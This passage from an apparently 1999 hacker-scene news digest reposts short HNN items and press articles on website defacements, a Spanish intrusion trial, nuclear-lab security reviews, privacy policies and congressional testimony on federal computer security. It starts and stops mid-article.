"The conclusions of the report and a multi-layered approach is welcome for dealing with cybercrimes rather than heavy-handed government regulation," said Yaman Akdeniz, director of Cyber-Rights & Cyber-Liberties (UK), reacting to Project Trawler.

"However, all these initiatives within the layers proposed should take into account the rights and liberties of Internet users."

He said the concerns expressed about the ability to intercept communications revealed law enforcement bodies were still worried about the use of cryptography for criminal purposes.

"Overall the publication of the report is welcome and most of the future problems may be avoided and prevented by the use and development of better security tools. Therefore the use and development of encryption tools should be encouraged rather than controlled for the prevention of cyber-crimes."

@HWA

77.0 !Hispahack Found Not Guilty
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 22nd 1999

From HNN http://www.hackernews.com/

contributed by LeCreme

The trial against !Hispahack member Jfs finished on June 2nd. The Spanish judge considered not guilty the only !Hispahack member that was accused of breaking into a university computer. This was the first case of unauthorized computer intrusion ever judged in Spain.

!Hispahack
http://hispahack.ccc.de/en/index.htm

78.0 asahi.com Defaced
~~~~~~~~~~~~~~~~~~~~~~

June 22nd 1999

From HNN http://www.hackernews.com/

contributed by YingYang

One of the major news sites in Japan, Asahi Shimbun Publishing Co.'s "asahi.com" was defaced in the last few days. The most interesting thing in this article is the claim that the news site has suffered several cyber intrusions in the past but that this was the first one to cause damage.
Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/moren/74419

Asahi Shimbun's News Site Suffers Illegal Access

June 22, 1999 (TOKYO) -- Asahi Shimbun Publishing Co.'s news site "asahi.com" was accessed illegally and could not display the home page in a standard way for a few minutes on June 20. According to Asahi Shimbun, the problem occurred because an outside person gained illegal access to one of the company's several mirror servers.

Within about 10 minutes, the mirror server was separated off, and a switch was made to the other servers. An investigation is focusing on the detailed circumstances and cause of the incident. From June 20 to the morning of June 21, the company reinforced its surveillance setup. A full-fledged investigation was set to start June 21, according to the company. Asahi Shimbun's www.asahi.com has been subjected to illegal access a few times, but the previous cases ended without causing any substantive damage. This was the first time that the content was actually written over.

As for illegal access to a newspaper company's news site and rewriting of the top page, another incident occurred recently in Japan. Mainichi Newspapers Co., Ltd.'s www.mainichi.co.jp, Mainichi INTERACTIVE suffered such a case on June 12.

(BizTech News Dept.)

@HWA

79.0 NSTAC Releases Reports
~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 22nd 1999

From HNN http://www.hackernews.com/

contributed by lamer

The National Security Telecommunications Advisory Committee has released several new reports detailing various aspects of federal computer security and infrastructure.

NSTAC
http://www.ncs.gov/nstac/NSTACReports.html

@HWA

80.0 FBI This Week
~~~~~~~~~~~~~~~~~~

June 22nd 1999

From HNN http://www.hackernews.com/

FBI This Week

contributed by ne0h

"FBI, This Week" is the name of the radio program broadcast to over 3,200 ABC Radio Network affiliates. This week's episode is all about International Computer Crime. If you miss the broadcast on your local station a RealPlayer version is available.

FBI This Week
http://www.fbi.gov/pressrm/radio/fbiweek.htm

@HWA

81.0 Cartoon Hackers?? (From HNN rumours section)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 22nd 1999

From HNN http://www.hackernews.com/

contributed by delchi

WB Scraps 'Real Hackers' Cartoon

Rumor has it that Warner Brothers and Mattel have scrapped an idea for a new Saturday morning cartoon with a tie-in toy line called "Real Hackers". The defunct storyline was to portray a group of real life hackers in cartoon form, reformed and fighting for good. Amongst the hackers to be represented were 'phiber optik', 'bernie s', 'death veggie', 'emmanuel goldstein' and 'weld pond' as cyber warriors as they fought criminals bent on destroying the internet. It is unknown why Warner Brothers and Mattel scrapped this idea or if it even existed in the first place but in this hot pre-Christmas marketplace, one can only wonder how long it will be before this ground breaking idea starts making money for somebody.
@HWA

82.0 Nuke Labs Stand Down
~~~~~~~~~~~~~~~~~~~~~~~~~

June 23rd 1999

From HNN http://www.hackernews.com/

contributed by Dr. Mudge

Yesterday was one of two stand down days at the national weapons labs (Los Alamos, Sandia, LLNL, etc), ordered by Energy Secretary Bill Richardson. This means that due to the pressure and publicity from the Cox/PFIAB reports no normal work was allowed at the labs. Only emergency and operational tasks were to be continued - 16 hours of training courses, web tests, discussion groups, etc. over a two day period take everything else's place. The training dealt with review of existing security efforts; everything from operational to computer security is being discussed, dissected, and hopefully digested. While this may be an excellent way to educate employees one can only hope that network security monitoring and analysis is considered essential daily activity.

Albuquerque Journal
http://www.abqjournal.com/news/1secrets06-21.htm

Future of Nuclear Weapons Program in Dispute

By Jim Abrams
The Associated Press

WASHINGTON -- The head of a presidential panel on nuclear weapons security, backed by congressional Republicans, says security problems within the Department of Energy can't be fixed without creating a new semi-independent agency to oversee nuclear arms programs. But Energy Secretary Bill Richardson said he is successfully confronting the security lapses revealed in investigations of suspected Chinese spying at weapons laboratories, and that no new agency is needed.

"We are ready to have a beefed-up security entity within the Department of Energy that is stronger," Richardson said on "Fox News Sunday." "What I don't want is a new agency that is autonomous that does not report to me."

But former Sen.
Warren Rudman, R-N.H., who chaired a panel of the president's Foreign Intelligence Advisory Board that issued a highly critical report of the DOE's counterintelligence efforts last week, said the department has failed to carry out two key security measures that President Clinton ordered 16 months ago. It has yet to fully implement polygraph tests for scientists at the labs and tighter security checks for foreign visitors, Rudman said on NBC's "Meet the Press." "The attitude of people within that department, in that bureaucracy, is astounding," he added. The Washington Post reported today that the federal government has begun administering polygraphs on the first of 5,000 nuclear weapons scientists and other sensitive employees at DOE. It could take four years to complete an initial round of examinations on the federal workers and private contractors working with highly classified nuclear secrets, said Edward J. Curran, head of Energy's counterintelligence office. So far, only that office's staff has been given the tests, he said. Richardson told the Post some employees and civil liberties groups are likely to protest the polygraphs and "I fully expect lawsuits." Richardson said there were still problems to resolve but "we have had dramatic improvements." He said he ordered a two-day stand-down at all the nuclear labs to test security measures, and that he plans to dismiss some people responsible for security lapses in about three weeks. Richardson last week also named retired Air Force Gen. Eugene Habiger, the former commander of all U.S. strategic nuclear forces, to head security operations at DOE. The president of the University of California, Richard C. Atkinson, has ordered a review of security at the three nuclear laboratories managed by the university to make sure national security is not being compromised. The FBI has investigated allegations that a former employee of Los Alamos National Laboratory was a spy for China. 
The university also manages Lawrence Livermore National Laboratory and Lawrence Berkeley National Laboratory. Atkinson has asked his Council on National Laboratories to examine whether newly tightened measures are being implemented and whether additional measures are needed. He also wants to compare the university's security to the protocol used by Lockheed Martin, which manages Sandia National Laboratories in Albuquerque.

Rudman, meanwhile, is expected to receive a good reception Tuesday when he testifies to Congress on his panel's recommendation that the weapons program become semi-autonomous, reporting only to the energy secretary.

"I agree with the Rudman report," said Sen. Richard Shelby, R-Ala., chairman of the Senate Intelligence Committee. "We've said all along that the labs are not safe today. They're not safe tomorrow." Richardson, he said, is trying to "seal the leaks at the labs. He's trying to bring accountability to the labs. But I believe it's going to take statutory change to do it. I don't believe ultimately he can do it just by himself."

Shelby said Republican Sens. Frank Murkowski of Alaska, Jon Kyl of Arizona and Pete Domenici of New Mexico would try to attach language on such a separation of powers to an intelligence spending bill coming before the Senate soon.

@HWA

83.0 X-Force Down Under is Hiring
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 23rd 1999

From HNN http://www.hackernews.com/

contributed by solvant

Need a job? Live in Australia? X-Force, part of ISS, is recruiting Australian security experts for their three month old Australian office. We sure hope they do thorough background checks, wouldn't want them hiring any evil hackers by mistake. A quote from the article by Chris Rouland of ISS: "I don't go out and recruit hackers per se; I look for very strong software engineers with a deep understanding of security and strong knowledge of the computer underground." If that isn't a hacker I don't know what is.
Fairfax IT
http://www.it.fairfax.com.au/software/19990621/A56795-1999Jun21.html

Australians hack into the X-Force

By DAVID BRAUE

AN international anti-hacker organisation, X-Force, is recruiting Australian security experts for an Australian brigade. X-Force is operated by the security software company Internet Security Systems (ISS), which opened its Australian office three months ago.

X-Force director Chris Rouland, in Brisbane last week to speak at a conference on computer security incident handling and response, said recruits for X-Force were "very difficult to find".

"I don't go out and recruit hackers per se; I look for very strong software engineers with a deep understanding of security and strong knowledge of the computer underground."

The Australian X-Force will join counterparts in London and Atlanta in keeping tabs on the underground community of hackers who attack government and corporate computer networks. Australian recruits will work while their overseas counterparts sleep, allowing a 24-hour security research organisation with global response capabilities.

The 50-strong X-Force continually folds, spindles and mutilates commercial software to identify weaknesses that might be taken advantage of by hackers. Among its accomplishments was being the first to decipher the insidious Back Orifice trojan horse virus and produce a fix for the problem.

"That was a good exercise for us, a chance to stretch our legs," laughs Rouland, about the application considered to be one of the most dangerous hacker attacks of the decade.

Reports suggest the team's efforts are paying off: the analyst firm Yankee Group recently reported ISS as having 30 per cent of the $US315 million ($485 million) adaptive security market, while the No 2 firm, Axent Technologies, had 19 per cent.

Many of the team's innovations - including proof-of-concept projects that are developed by a special team known as Protoworx - end up as additions to ISS's commercial suite of intrusion detection software. Recent X-Force work has produced the likes of the Attack Tracker (which allows intrusion detection systems to trace and identify incoming intruders); Casper (a Linux server that offers itself as a tempting target for hackers while collecting data on their break-in attempts); and the new Total Surveillance Architecture.

@HWA

84.0 More Canadian RedBoxing from HackCanada
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 23rd 1999

From HNN http://www.hackernews.com/

contributed by RenderMan

Need a RedBox in Canada? Got a Diamond Rio for your MP3s? One more reason for the authorities to hate MP3s and the device. HackCanada has released a text file on how to use your Diamond RIO as a RedBox.

HackCanada
http://www.hackcanada.com/canadian/phreaking/riobox.txt

85.0 SecureMac is Now Open
~~~~~~~~~~~~~~~~~~~~~~~~~~

June 23rd 1999

From HNN http://www.hackernews.com/

contributed by MacUser

SecureMac.com has opened their doors this week to a new site devoted to Macintosh Security. Learn more about the security that exists for the Mac, and how to make your system more secure. Learn just how weak or strong the security is on certain products as well. This site covers encryption, security, viruses, and much more. This site is run by the same person who runs Freaks Macintosh Archives, a site devoted to Macintosh hacking and security.

SecureMac.com
http://www.securemac.com

Freaks Macintosh Archive
http://freaky.staticusers.net

@HWA

86.0 Microsoft Demands Privacy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 23rd 1999

From HNN http://www.hackernews.com/

contributed by Sangfroid

Following in IBM's footsteps Microsoft will now demand a privacy statement be present on all web sites that it buys advertising from. Why have the two largest internet advertisers taken this stance?
The FTC is about to make its recommendations to congress about whether tough new federal privacy laws should be enacted. Of course this means that HNN will have to post something about how you have no privacy and that we log everything, but then so does every other web site. It should be a fun page to write. Look for it in the next few days.

Nando Times
http://www.techserver.com/story/body/0,1634,62850-99839-710835-0,00.html

Microsoft to require privacy statement before advertising on Web sites

Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

By TED BRIDIS

WASHINGTON (June 22, 1999 11:21 p.m. EDT http://www.nandotimes.com) - Microsoft Corp., the largest advertiser on the Internet, has decided it will not buy ads next year on Web sites that fail to publish adequate privacy promises to consumers.

The announcement comes less than three months after a similar decision by IBM, the Web's second-largest advertiser. The actions by the two companies come as the Federal Trade Commission prepares its recommendations to Congress on whether tough new federal privacy laws are needed to protect consumers online.

The Microsoft announcement to be made Wednesday was expected at a computer conference in New York and will take effect after the end of the year. Microsoft said it spent about $30 million last year on Web ads - but that's still a small portion of the $2 billion spent last year on Web advertising, according to the Internet Advertising Bureau.

Microsoft, which has lobbied with other industry groups against privacy legislation, earlier this year began offering a free digital tool kit that promises to allow consumers to use next-generation software to restrict what personal details Web sites collect about them.

Consumers typically must manually find a company's online privacy statement, if one exists, and read through legalese to determine what personal information a Web site might be harvesting, such as their name, e-mail address or even favorite authors or clothing sizes.

Last month, an industry-financed study showed businesses have made dramatic improvements since last year in warning people how companies use personal information collected about them. Nearly two-thirds of commercial Internet sites displayed at least some warning that businesses were collecting personal details from visitors, such as names, postal and e-mail addresses, and even shopping tastes, the study found. But less than 10 percent of those sites had what experts consider comprehensive privacy policies.

A similar study last summer by the FTC found only 14 percent of sites warned how companies used private information they collected about customers.

@HWA

87.0 Pentium III has 46 Bugs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 23rd 1999

From HNN http://www.hackernews.com/

contributed by Kanuchsa

The Pentium III bug list has been posted by Intel in PDF format; it lists 46 bugs, or "erratums" as Intel likes to call them. Not many hardware fixes for them are planned, mainly because Intel is calling them minor. One of them is an FPU error for which there appear to be no plans for a fix in the future.

The UK Register
http://www.theregister.co.uk/990617-000007.html

PDF Doc listing 'erratums' not bugs
ftp://download.Intel.nl/design/pentiumiii/specupdt/24445304.pdf

88.0 'War' Against FBI Continues
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 24th 1999

From HNN http://www.hackernews.com/

contributed by dis-crete

F0rpaxe has struck again and this time defaced the web site of the Naval Training Systems Center with some serious rhetoric leveled against the FBI.
DigiAlmighty defaced the Naval Surface Warfare Center which is slightly ironic as the Dahlgren division of NSWC helped develop the Co-operative Intrusion Detection Evaluation and Response program commonly referred to as the 'hacker tracker'. Additionally the web site for NASA's Earth Observing System Data and Information System has been defaced by the Keebler Elves. HNN has mirrors of all three sites available. (Mirrors provided by attrition.)

Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0621/web-navyhack-6-23-99.html

HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html

JUNE 23, 1999 . . . 7:52 EDT

Hacker groups target Navy sites

BY BOB BREWIN (antenna@fcw.com) AND DIANE FRANK (diane_frank@fcw.com)

In the wake of attacks on the FBI World Wide Web sites earlier this month, hacker groups have now turned their attention to the Navy, including the Web site of a Navy organization that helped develop sophisticated hacker-tracker software.

Last week a hacker defaced the Web site (www.nswc.navy.mil) of the Naval Surface Warfare Center's Dahlgren, Va. division with a mostly obscene message that read in part, "FEDS: You will never stop my FLOW. Nice try, though. Killing my hotmail account and all that. HAHHAHA."

The Dahlgren division of NSWC helped develop the Co-operative Intrusion Detection Evaluation and Response program (www.nswc.navy.mil/ISSEC/CID/), which uses automated tools to track and analyze hacker attacks.

Another hacker -- who, based on the postings on the defaced Navy Web sites, may be engaged in a hacker duel with the Dahlgren attacker -- hit the Web site of the Naval Air Warfare Center Training Systems Division (www.ntsc.navy.mil), Orlando, Fla. This hacker, who affiliated himself with the group f0rpaxe, said on the defaced Navy page, "We own the Naval Air Warfare Center Systems Training Division. FBI spokesman said we were only doing some gov and mil servers [but] we rooted Naval Air Warfare Training Center....We had been exploring entire servers until today."

Navy spokesmen have not returned calls from FCW asking for comment on the Web attacks.

89.0 Singapore Officials Arrest Two
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 24th 1999

From HNN http://www.hackernews.com/

contributed by Dioxin

Two individuals have been arrested for violations of the Computer Misuse Act for their involvement in the recent web defacements of www.tcs.gov.sg and www.mediacity.com.sg (Television Corporation of Singapore). Apparently, they had forgotten to spoof their addresses before they committed the dirty act. They face a maximum of a S$10,000 fine and up to three years in jail. Speculation is that they used the new malformed .htr request bug in IIS to gain entry to the servers.

The Straits Times
http://straitstimes.asia1.com.sg/cyb/cyb1_0624.html
(Link not found June 25th - Ed)

90.0 GSA Looking for IDS
~~~~~~~~~~~~~~~~~~~~~~~~

June 24th 1999

From HNN http://www.hackernews.com/

contributed by erewhon

The General Services Administration is looking for vendors to set up and manage intrusion detection systems for civilian agency networks to monitor for cyber intrusions. The GSA plan calls for information gathered by the system to be sent to a central facility in Washington DC for analysis.

Federal Computer Week
http://fcw.com/pubs/fcw/1999/0621/web-gsa-6-23-99.html

JUNE 23, 1999 . . . 11:10 EDT

GSA seeks tools, services to monitor government nets

BY DIANE FRANK (diane_frank@fcw.com)

The General Services Administration is seeking vendors qualified to set up and manage hardware and software to monitor civilian agency networks for security breaches, the agency announced today.

The project, being managed by the GSA Federal Technology Service's Office of Information Security, aims to build a full intrusion-detection system that will enable agencies to identify and collect information on external attacks on federal information technology resources, according to a notice published in Commerce Business Daily.

The program initially will focus on identifying external attacks on agency systems. Under GSA's plan, information collected by the system will be transmitted almost immediately to a central analysis facility in the Washington, D.C., area.

@HWA

91.0 There's Money in them thar videos! (DEFCON WEBCAST)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 24th 1999

From HNN http://www.hackernews.com/

DefCon Live WebCast

contributed by Shanners

Unable to make it to Las Vegas this year? HNC Network, an HNN Affiliate, will be conducting a live webcast from the show floor. They will cover Hacker Jeopardy, Hacker Death Match, as well as numerous live interviews with speakers and attendees, and some recorded material. There will also be prizes given away through the webcast like Free/OpenBSD, RH 5.2 and Hackers Secrets 5. They are charging $29.95 for the three day broadcast.

Live Defcon Webcast
http://www.hack-net.com/defcon

(I dunno, you make your own decisions on this one ... - Ed)

92.0 Kasparov Defaced?
~~~~~~~~~~~~~~~~~~~~~~

June 24th 1999

From HNN http://www.hackernews.com/

contributed by macwizard

Well, something has been going on with the World vs. Kasparov Chess Match. Microsoft says it was technical difficulties due to server overload. We have received a few emails saying that the site was indeed broken into. It is claimed that the password to the site was sniffed and that is how entry was gained. Unfortunately we are unable to confirm either the MS position or the emails.
BBC
http://news2.thdo.bbc.co.uk/hi/english/sci/tech/newsid%5F376000/376147.stm

Sci/Tech

Kasparov's chess pieces disappear

Kasparov will have 24 hours per move

As the world's chess fans gathered on the Internet to pit their wits against champion Garry Kasparov, unorthodox rooks, knights, bishops and queens began appearing and disappearing on the board.

Billed as the greatest Internet chess challenge ever, the chance to log on and compete against the world's greatest player attracted over two million hits in the first few hours. But the Microsoft Gaming Zone Web site hosting the tournament was not up to the challenge.

As Bob Sullivan, technology reporter with MSNBC News watched, things began to go wrong, before a single move had been played. "Chess pieces were landing all over the board," Mr Sullivan reported.

According to MSNBC, the problems were due to server overload - a technical hitch rather than a hacker spoiling the site on purpose. "It is certainly an embarrassment for the company," said Mr Sullivan.

First move

After Mr Kasparov's opening move (Pawn to E-4) in New York on Monday, he travelled to Washington, DC, where users guided by four young chess experts initiated the "Sicilian Defence", moving pawn to C-5. The World Team's first move was chosen by 41% of those voting.

Kasparov declined to make another move in order to maintain the "suspense," said Audrey Waters, the chess champion's spokeswoman. He has 24 hours to respond.

Deep Blue challenge

Mr Kasparov is widely regarded as the greatest chess player ever. He has been particularly strong over the last few months with three convincing tournament victories in a row.

In 1996 and 1997, he played two six-game matches against the Deep Blue computer, winning the first and losing the second. Millions of Net users are believed to have followed those games. It was the first time a computer had defeated a reigning world champion in a match played under classical chess rules.

The chances of the world beating Mr Kasparov seem lower.

@HWA

93.0 Russ Cooper Interview
~~~~~~~~~~~~~~~~~~~~~~~~~~

June 24th 1999

From HNN http://www.hackernews.com/

contributed by Space Rogue

MSNBC has an excellent interview with Russ Cooper, the NTBugTraq administrator. If you subscribe to NTBugTraq, or even if you don't, you should read this.

MSNBC
http://www.msnbc.com/news/283054.asp

Surgeon general of the Web?

NTBugTraq’s Russ Cooper serves as independent authority on bugs, viruses, security issues

By Bob Sullivan
MSNBC

June 23 — The eruption of a new computer virus often leads to massive confusion. Besieged system administrators and confused users need hard information about what the danger is and what to do, but it’s elusive. Adding to the confusion, anti-virus software companies issue superlative-laden press releases, perhaps exaggerating the real threat. Meanwhile, software vendors like Microsoft often downplay the threats to prevent bad PR. In the middle of this maelstrom is Russ Cooper.

WHO’S RUSS COOPER?

He’s the owner and administrator of perhaps the most popular security mailing list on the Internet, NTBugTraq — a sort of emergency broadcast system for computer network administrators. When any security hole is found, it’s posted to this list, sometimes even before Microsoft or anti-virus companies know about it. (Microsoft is a partner in MSNBC.) In fact, it’s a pelt of honor to be the first to send Cooper a bug, and posters do so sometimes to attract the attention of future employers.

As the human filter for NTBugTraq’s 25,000 very devoted members, Cooper serves as a kind of referee for groups arguing about the authenticity and severity of computer crises, but he has his sights set on a loftier goal. He views himself as the surgeon general of the Internet. His grand plans include launching an Internet security “portal” Web site called Securityadvice.com in the fall.
WITHOUT THE MARKETING SPIN “I just want to try and be a consistent voice to the masses for these types of issues,” Cooper said. “Trying to give the facts in a way people can understand that doesn’t overemphasize the threat. ... I don’t try and downplay things, but I’m not trying to get a stock increase out of [announcements]. I want people to be informed of the facts without the marketing spin.” His bare-bones, straightforward style came through on April 23, just before the Windows CIH/Chernobyl virus hit. While anti-virus companies and media outlets were warning of potential data devastation that never materialized in the United States, Cooper sent this note to his list: “The CIH virus might cause problems on Monday, April 26th, for some of you. Do a virus scan before 4/26/99. Check with your anti-virus vendor if you don’t know what it is, or see; http://www.antivirus.com/vinfo/alerts.htm for more info. ‘nuff said here.” Securityadvice will be a commercial site, and Cooper says his bankers have raised $2 million. But for now, he administers NTBugTraq and its companion Web site out of the goodness of his heart (the Web site does take in about $7,000 to $8,000 in advertising a month, enough to pay for a secretary and cover expenses). COOPER’S GIRLFRIEND Cooper’s heart shone through six weeks ago when the 39-year-old divorced man decided he was tired of living alone and took out a half-page personal ad in the local Lindsay, Ontario, newspaper, headlined, “Meg Ryan, where are you?” “I own my own business working on the Internet, became internationally recognized in my field, and moved to Lindsay to enjoy an idealistic lifestyle of working from home,” he wrote in the ad. Days later, a bus driver who read the ad set him up, and he has spent his weekends with Kathy ever since. But his weekdays, and weeknights, are devoted to the list. Cooper now spends 12 to 14 hours Monday through Friday in front of a computer screen. 
That includes the computer screen that hovers over his bed, hospital tray style. A COMPUTER IN HIS BOAT? “I can sit in bed and type and read away. I can do a quick check when I get up in the morning. ... I haven’t figured out how to get one in my boat yet,” Cooper joked. “In this role I have to be real responsive timewise.” Included in this labor of love are hours of free consulting Cooper offers to the 25,000 list members who send notes with possible “exploits.” He edits every note that comes in, removing redundant e-mails, posting only verifiable information. As often as not, a flaw sent to the list is caused by human error, not a computer bug, and Cooper offers free help desk-like advice to fix the problem. That keeps traffic on the list down to a trickle of about 10 messages or so per day — but all of them laser-focused. “People have told me in the past that they read every message I send and are prepared to react to every message I send,” Cooper said. THE IMPRESSIVE AUDIENCE Among those ready to react to every Cooper message: Jason Garms, the lead product manager for Windows NT security at Microsoft, who’s a list member. Even though Cooper’s list is devoted to publicly flogging (some might say embarrassing) Microsoft by revealing flaws in Windows NT, Garms says he has a good, personal working relationship with Cooper. They correspond by e-mail as often as once a week. “We don’t always see eye to eye with Russ,” said Garms, who has worked with Cooper since NTBugTraq went online in 1997 and isn’t crazy about times the list has posted exploits before Microsoft has had the time to fix the problem. After all, hackers monitor the list, too. “But we’ve had a good working relationship,” Garms said. “Russ provides an important service.... 
The reality is, an independent forum is always going to be useful.” Anti-virus vendors also sit poised to act on every Cooper-NTBugTraq note — even Network Associates, which Cooper has frequently criticized for exaggerating security threats. “It forces companies to keep on their toes,” said Dan Takata, spokesman for Data Fellows Inc., another security company. “He can’t always make everyone happy. He has gotten flamed by top anti-virus people, but I think he’s doing a valuable service.” PROVING GROUNDS Living in between software vendors and security firms might sound like precarious work, but Cooper’s eclectic background serves as solid preparation. He spent most of 1984-1990 running banking networks in Liberia, Africa. He didn’t return to Canada until he was forced out during the Liberian Revolution. He then took a job at the University of Toronto trying to make Novell’s Netware, Oracle software, an IBM mainframe and Windows 3.1 all work together. During this time, he honed the fine art of pestering software vendors by telephone, forcing them to support their products. “I follow instructions, and when it doesn’t work, I tell them I’m going to sue,” he said. “Asking questions is a skill. Asking questions of a vendor is an art.” AVOIDING RELIGIOUS WARS Later he went to work for Tandem Computers and subsequently held various networking jobs implementing Microsoft software. As the Internet explosion unfolded, he monitored mailing lists that continually slammed Windows NT security. But in many cases, posters were making religious statements such as “switch to Linux” more than they were engaging in a scientific debate over what NT could or couldn’t do. So in 1997, he filled that gap with NTBugTraq. And thus began Cooper’s odd role as a constant public flogger of NT’s flaws — and perhaps NT’s most public independent supporter. “I’m just trying to get rid of some of the religious arguments going on,” Cooper said. 
“There are people bashing NT because they didn’t know what it could do. I wanted to get intelligent security people to tell me the real issues with NT.” The list now acts as a filtering service both for Microsoft and for NT users. Instead of hundreds of e-mails from hundreds of administrators landing at Microsoft headquarters in Redmond, Wash., Cooper offers this promise: “You post to NT BugTraq, and I’ll follow up with Microsoft. ... They know if something’s coming from me, it has had a bit more work done on it.” SECURITYADVICE.COM The list doesn’t just cover Windows NT administration issues — it touches anything that might impact a computer professional running a Windows-based network. That made NTBugTraq a solid place for information on the most recent security/virus crises, such as Melissa and ExploreZip. But now he plans to expand that expertise, to all security issues facing all Internet users. “We’ll have two communities — one being the experts and the other being the Mom and Pop side,” Cooper said. He’ll then work to convince normal Internet users about the importance of security issues. Regular contributors will include Vin McClellan, an expert in cryptography, and Robert Abbott, sometimes known as the father of Internet security. Abbott was also the technical advisor for the cybercrime cult movie “Sneakers.” And of course, information will be available in e-mail format. Cooper and his Securityadvice.com concept have their detractors. He’s been criticized as a self-promoter, and his for-profit security site idea flies in the face of computer “purists” such as Linux coders who believe such information should be free; or that only a non-profit organization can really offer a “Good Housekeeping seal” for security information. “I’m not worried about commercializing my credibility,” Cooper said. ”[Someone] said I am doing all this for self-promotion. Maybe that’s true. 
But I’d like to think that what I’m promoting is helping people.” @HWA 94.0 Thanks-CGI Defaced With Its Own Script ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 24th 1999 From HNN http://www.hackernews.com/ contributed by Code Kid "The Coolest CGI Magician On The Net", has been defaced with one of its own tricks. Thanks-CGI has been a recent victim of poor security. If you have purchased scripts from this service in the past you may want to double check them to be sure you are not vulnerable as well. 7am News http://7am.com/cgi-bin/twires.cgi?1000_t99062202.htm Hacked Site Alleges Media Conspiracy Updated 7:35 am PDT, 24 June 1999 By Bruce Simpson Although repaired and back online within just a few short hours, the Thanks-CGI website appears to have been hit a second time by the "Hackers In Paradise" group. This time the group appear happy to have simply changed the scrolling javascript banner at the bottom of the page to read "HiP Welcomes you to THANKS-CGI.... We're trying to make your site more secure for the world!" The operator of the website has told 7am.com that they are currently testing for holes in their CGI scripts. They have suggested that the security hole may not be the fault of their scripts -- rather that it could have been a "misconfiguration between cgi script and the server." 7am.com discovered the hack while researching another story on CGI resources and contacted the site's operator by email immediately the problem was noticed. However, the operator of the Thanks-CGI site has suggested that because "the arrival of your e-mail was paced so closely with the occurence [sic] of the hackage ... we have strong reason to believe there might be a relationship between 7am.com and the hacker who hacked our site." 7am.com denies the allegations. 
Original Report To plagiarize and modify just a little: "As ye shall live by the Net, so shall ye die by the Net" -- at least that's the message "Hackers in Paradise" appear to be trying to impart on the operator of the Thanks-CGI site. Billing itself as "The Coolest CGI Magician On The Net", the Thanks-CGI site appears to have been left with a large amount of egg on its face after "Hackers in Paradise" seemingly exploited a security hole in one of the scripts and hacked the site's front page. "Yep another site selling cgi scripts with major security problems. CGI programmers need to spend a little time testing the security aspect of thier [sic] scripts before trying to make money with them" is the embarrassing message that greeted visitors to the hacked site. 7am.com has attempted to contact the operators of the Thanks-CGI site for comment but as yet they have not replied to our email. In the meantime, those who have purchased scripts from the site may well be advised to get a guarantee that the same hole which allowed hackers into the thanks-CGI site is not present in the software they purchased. @HWA 95.0 ToorCon Date Changes ~~~~~~~~~~~~~~~~~~~~~ June 24th 1999 From HNN http://www.hackernews.com/ contributed by skalore The date of ToorCon has changed to September 3rd-4th, 1999. There will be no San Diego 2600 Meeting due to ToorCon falling on that date. The expo has also moved to the Price Center in The University of California, San Diego. HNN Cons Page http://www.hackernews.com/cons/cons.html 96.0 Gov Vulnerable Due to Lack of Training ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 25th 1999 From HNN http://www.hackernews.com/ contributed by Fedb0y The Technology Subcommittee of the House Committee on Science heard expert testimony on Thursday claiming that computer security training is desperately needed. 
The experts stressed that most federal employees do not take computer security seriously and that this is one reason for the numerous successful attacks on federal systems. Another reason that was given was the low salaries for properly trained security personnel. When good people are found or developed in house they are usually lured away by the private sector. San Jose Mercury News http://www.sjmercury.com/breaking/docs/055607.htm ABC News http://abcnews.go.com/sections/tech/DailyNews/hackers_govt990624.html USA Today http://www.usatoday.com/life/cyber/tech/ctf465.htm APB Online http://www.apbonline.com/911/1999/06/24/hack0624_01.html MSNBC http://www.msnbc.com/news/283837.asp US House Committee on Science http://www.house.gov/science/welcome.htm Congress May Ask for Regular Security Reports At the above hearing Rep. Connie Morella (R-Md.) mentioned that federal agencies should report the status of their computer security to Congress on a regular basis. She plans to include the requirement in her revision of the Computer Security Act of 1987. All three witnesses at the hearing agreed this was a good idea. Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0621/web-security-6-24-99.html Additional Government Sites Defaced While hearings were being held, additional government sites were being defaced. This time it was Monmouth Army Base and the Argonne National Labs library. (mirrors provided by attrition) HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html San Jose Mercury News; Posted at 10:44 a.m. PDT Thursday, June 24, 1999 Government vulnerable to hackers, experts warn WASHINGTON (AP) -- Government web sites and computer networks are increasingly vulnerable to ``cyber attacks'' because they lack trained personnel and don't follow security plans, federal officials warned a congressional committee today. 
Few people have adequate training to defend government websites, and those who do seldom work in government for long, three panelists told the House Science Committee's subcommittee on technology. The security agencies ``train people at government expense and the private sector waves a bigger paycheck and takes them away,'' said Keith Rhodes, technical director with the General Accounting Office. In addition, government security experts often find their advice isn't followed, said Raymond Kammer, director of the National Institutes for Standards and Technology, which recommends security measures for federal computers. ``It is imperative that federal agencies implement vigorous security programs,'' Rhodes said. Hacker attacks like the recent defacing of the Senate web site are well documented, but information about attempts to access sensitive intelligence information is ``very sketchy,'' said Michael Jacobs, a deputy director of the National Security Agency. Hackers are often nearly impossible to trace unless they boast of their actions. In the most common type of attack, hackers overwhelm web sites with a flood of requests for information, causing the site to slow or shut down. Hackers can also redirect visitors to a fake web site that appears to be the official site, as happened earlier this month to the Senate site. ``We are clearly seeing an escalation in both the destructive nature and aggressive pace of these and other attacks,'' Jacobs said. -=- ABC; Gov’t Server Hacker Warning Expert Panel Says Web Sites Are Vulnerable By David Ho The Associated Press W A S H I N G T O N, June 24 — Government web sites and computer networks are increasingly 